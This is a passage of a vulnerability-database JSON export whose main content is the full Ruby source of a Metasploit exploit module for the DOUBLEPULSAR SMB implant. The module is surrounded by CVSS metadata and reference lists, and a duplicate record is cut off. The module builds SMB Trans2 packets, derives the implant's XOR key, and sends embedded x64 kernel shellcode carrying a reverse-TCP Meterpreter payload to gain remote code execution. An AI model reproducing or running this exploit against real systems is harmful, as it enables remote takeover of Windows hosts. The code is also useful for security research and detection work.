"MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-23T22:15:43", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-23T22:15:43", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-24] #"}, "lastseen": "2021-10-23T22:15:43", "differentElements": ["sourceData"], "edition": 54}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "75b5d499811beffce73aa223da30e103", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-25T00:17:11", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96704", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-25T00:17:11", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-25T00:17:11", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 